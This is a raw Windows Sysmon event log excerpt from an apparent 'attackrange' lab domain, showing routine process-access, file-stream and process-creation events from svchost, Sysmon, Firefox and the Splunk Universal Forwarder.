23542300x80000000000000001046431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.138{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1C5DFFEB79D9A94EC4A45E52E4DDBD65,SHA256=90529B00EC6FE84B9318BE1369B57287C4EA1427B4E45EA7A495B41C0F4F86CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:27.137{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FAFEEF8726B565B1E6A5D72A7F9C9957,SHA256=CA9DC6E4640C14EA939E582B701D1149849715BEDD591F52CD793DEAF97AE0FC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806336Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.610{0C1E0330-F317-60EB-4779-00000000D001}10001668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806335Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:27.469{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806334Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806333Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806332Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806331Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806330Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806329Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806328Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.469{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.453{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.453{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:27.454{0C1E0330-F317-60EB-4779-00000000D001}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A51A2C55BDE9D850C8A0AA9019E7B1D,SHA256=B3D9535AD7AFA73281224170E6851B3CFDB1D645526B9F1443876C4FD52A464D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:28.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E65AEEB4EFB56FB1B931BCAE2021DC06,SHA256=8F7D97212ED5738ABE139F9D5DDA1727560026EFB8C73B84FC756568DCF883AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.281{0C1E0330-F318-60EB-4879-00000000D001}39962064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F318-60EB-4879-00000000D001}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:45:28.156{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 